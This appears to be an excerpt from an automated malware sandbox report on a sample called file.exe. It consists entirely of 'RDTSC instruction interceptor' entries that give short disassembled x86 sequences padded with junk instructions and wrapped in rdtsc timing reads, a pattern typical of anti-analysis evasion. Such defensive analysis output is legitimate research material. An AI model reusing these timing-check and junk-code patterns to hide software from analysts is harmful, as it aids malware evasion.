                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ABD7E second address: 7ABD9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F488D045406h 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BCBF5 second address: 7BCC1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F488C756D01h 0x0000000d pop esi 0x0000000e push eax 0x0000000f pushad 0x00000010 jmp 00007F488C756CFCh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BE2CB second address: 7BE2DB instructions: 0x00000000 rdtsc 0x00000002 jng 00007F488D0453F6h 0x00000008 jne 00007F488D0453F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6F4E second address: 7C6F52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6F52 second address: 7C6F56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6F56 second address: 7C6F5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C5FBB second address: 7C5FC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C5FC1 second address: 7C5FC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C5FC7 second address: 7C5FCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C5FCB second address: 7C5FEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F488C756D03h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C615F second address: 7C6167 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6167 second address: 7C616C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C9554 second address: 7C9576 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488D045406h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007F488D0453F6h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CB28E second address: 7CB2A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F488C756CF6h 0x00000009 jmp 00007F488C756D00h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DC83D second address: 7DC841 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D701E second address: 7D7023 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DFF25 second address: 6DFF2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DFF2A second address: 6DFF30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DFF30 second address: 6DFF34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DFF34 second address: 6DFF44 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F488C756CF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DFF44 second address: 6DFF4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DFF4D second address: 6DFF51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 805C5D second address: 805C74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F488D0453FEh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 805C74 second address: 805C78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 805F17 second address: 805F1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 805F1E second address: 805F23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 805F23 second address: 805F2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8061E0 second address: 806218 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488C756D06h 0x00000007 push ecx 0x00000008 jmp 00007F488C756D01h 0x0000000d pop ecx 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pushad 0x00000014 popad 0x00000015 pop eax 0x00000016 pushad 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 806218 second address: 80621F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80621F second address: 80623A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F488C756D03h 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80623A second address: 806252 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F488D045404h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 806252 second address: 806256 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8067D4 second address: 806812 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F488D045405h 0x00000008 pop esi 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F488D045405h 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 je 00007F488D045402h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 806812 second address: 806824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F488C756CF6h 0x0000000a js 00007F488C756CF8h 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8096D1 second address: 8096D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 809770 second address: 809787 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F488C756CFDh 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 809787 second address: 8097ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F488D0453FCh 0x0000000c jbe 00007F488D0453F6h 0x00000012 popad 0x00000013 nop 0x00000014 jmp 00007F488D0453FEh 0x00000019 push 00000004h 0x0000001b mov dh, 8Ch 0x0000001d mov edx, dword ptr [ebp+124550E6h] 0x00000023 call 00007F488D0453F9h 0x00000028 pushad 0x00000029 jmp 00007F488D045403h 0x0000002e jo 00007F488D0453FCh 0x00000034 js 00007F488D0453F6h 0x0000003a popad 0x0000003b push eax 0x0000003c pushad 0x0000003d pushad 0x0000003e je 00007F488D0453F6h 0x00000044 push ebx 0x00000045 pop ebx 0x00000046 popad 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8097ED second address: 8097F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8097F1 second address: 809815 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007F488D0453FEh 0x00000010 mov eax, dword ptr [eax] 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 je 00007F488D0453F6h 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 809AC5 second address: 809ADF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488C756CFEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F488C756CFCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 809ADF second address: 809AF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F488D0453FCh 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 809AF3 second address: 809B3A instructions: 0x00000000 rdtsc 0x00000002 jns 00007F488C756CFCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007F488C756D09h 0x00000013 mov eax, dword ptr [eax] 0x00000015 push edi 0x00000016 je 00007F488C756CF8h 0x0000001c pop edi 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 push esi 0x00000024 je 00007F488C756CF6h 0x0000002a pop esi 0x0000002b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 809B3A second address: 809B3F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80CC36 second address: 80CC46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F488C756CFBh 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80E766 second address: 80E76C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B50EFD second address: 4B50F35 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488C756D09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F488C756CFEh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 mov esi, 67DB2769h 0x0000001a popad 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B50F35 second address: 4B50F7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488D0453FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F488D045406h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F488D045407h 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B40D7C second address: 4B40DA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488C756D01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F488C756CFCh 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B40DA0 second address: 4B40DA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B40DA6 second address: 4B40DAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B806BC second address: 4B806E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488D045409h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movsx ebx, ax 0x00000010 push esi 0x00000011 pop ebx 0x00000012 popad 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B806E3 second address: 4B80779 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, C529h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F488C756D05h 0x00000012 or ah, 00000036h 0x00000015 jmp 00007F488C756D01h 0x0000001a popfd 0x0000001b pushfd 0x0000001c jmp 00007F488C756D00h 0x00000021 jmp 00007F488C756D05h 0x00000026 popfd 0x00000027 popad 0x00000028 xchg eax, ebp 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c mov edx, 33B2CC1Eh 0x00000031 pushfd 0x00000032 jmp 00007F488C756CFFh 0x00000037 or al, FFFFFFCEh 0x0000003a jmp 00007F488C756D09h 0x0000003f popfd 0x00000040 popad 0x00000041 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B80779 second address: 4B807AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488D045401h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov edx, eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F488D045406h 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B20132 second address: 4B20187 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F488C756D09h 0x00000009 sbb al, FFFFFFA6h 0x0000000c jmp 00007F488C756D01h 0x00000011 popfd 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F488C756D09h 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B20187 second address: 4B2018B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B2018B second address: 4B20191 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B20191 second address: 4B201B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 6089h 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d jmp 00007F488D045402h 0x00000012 mov ebp, esp 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 push ecx 0x00000018 pop edx 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B201B7 second address: 4B20252 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F488C756D08h 0x00000008 sbb ah, 00000038h 0x0000000b jmp 00007F488C756CFBh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushfd 0x00000014 jmp 00007F488C756D08h 0x00000019 adc al, FFFFFF98h 0x0000001c jmp 00007F488C756CFBh 0x00000021 popfd 0x00000022 popad 0x00000023 push dword ptr [ebp+04h] 0x00000026 jmp 00007F488C756D06h 0x0000002b push dword ptr [ebp+0Ch] 0x0000002e pushad 0x0000002f mov di, cx 0x00000032 pushfd 0x00000033 jmp 00007F488C756CFAh 0x00000038 and cx, 9A28h 0x0000003d jmp 00007F488C756CFBh 0x00000042 popfd 0x00000043 popad 0x00000044 push dword ptr [ebp+08h] 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c popad 0x0000004d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B20252 second address: 4B20258 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B40B2E second address: 4B40B71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 mov ecx, edi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d jmp 00007F488C756D05h 0x00000012 movzx esi, dx 0x00000015 popad 0x00000016 mov ebp, esp 0x00000018 pushad 0x00000019 push edx 0x0000001a mov bh, ah 0x0000001c pop edx 0x0000001d call 00007F488C756CFEh 0x00000022 mov edi, esi 0x00000024 pop eax 0x00000025 popad 0x00000026 pop ebp 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B4074E second address: 4B40754 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B40754 second address: 4B40758 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B40758 second address: 4B4075C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B4075C second address: 4B4078C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007F488C756CFCh 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007F488C756D00h 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B4078C second address: 4B40790 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B40790 second address: 4B407AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488C756D09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B407AD second address: 4B407B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B407B3 second address: 4B407B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B407B7 second address: 4B407BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B406BC second address: 4B406D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488C756D08h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B8062C second address: 4B8067C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 mov bx, 72D0h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d pushad 0x0000000e pushad 0x0000000f jmp 00007F488D0453FBh 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pushfd 0x00000018 jmp 00007F488D045406h 0x0000001d sbb ax, 5E48h 0x00000022 jmp 00007F488D0453FBh 0x00000027 popfd 0x00000028 popad 0x00000029 mov ebp, esp 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e push edi 0x0000002f pop eax 0x00000030 pushad 0x00000031 popad 0x00000032 popad 0x00000033 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B60375 second address: 4B60385 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F488C756CFCh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B60385 second address: 4B603B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and dword ptr [eax], 00000000h 0x0000000b jmp 00007F488D045407h 0x00000010 and dword ptr [eax+04h], 00000000h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 movsx edx, cx 0x0000001a mov ebx, eax 0x0000001c popad 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B405BD second address: 4B405F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F488C756D07h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F488C756D02h 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B405F1 second address: 4B40636 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 44747AF4h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f mov edi, 4705DBEAh 0x00000014 movsx edi, si 0x00000017 popad 0x00000018 mov ebp, esp 0x0000001a pushad 0x0000001b jmp 00007F488D045408h 0x00000020 mov di, ax 0x00000023 popad 0x00000024 pop ebp 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 mov bx, 651Ch 0x0000002c mov edx, 1A0AB708h 0x00000031 popad 0x00000032 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B40636 second address: 4B4063C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B4063C second address: 4B40640 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B50E1F second address: 4B50E50 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F488C756CFDh 0x00000008 sbb ecx, 1D58A326h 0x0000000e jmp 00007F488C756D01h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c pop ebx 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B70CDC second address: 4B70CE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B70CE2 second address: 4B70CE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B70CE6 second address: 4B70CEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B70CEA second address: 4B70D74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b call 00007F488C756D07h 0x00000010 pop eax 0x00000011 popad 0x00000012 movsx edx, ax 0x00000015 popad 0x00000016 mov dword ptr [esp], ebp 0x00000019 pushad 0x0000001a pushad 0x0000001b movzx ecx, dx 0x0000001e mov bh, 9Eh 0x00000020 popad 0x00000021 pushfd 0x00000022 jmp 00007F488C756D02h 0x00000027 xor eax, 2BABA488h 0x0000002d jmp 00007F488C756CFBh 0x00000032 popfd 0x00000033 popad 0x00000034 mov ebp, esp 0x00000036 jmp 00007F488C756D06h 0x0000003b xchg eax, ecx 0x0000003c jmp 00007F488C756D00h 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 mov bx, cx 0x00000048 popad 0x00000049 rdtsc
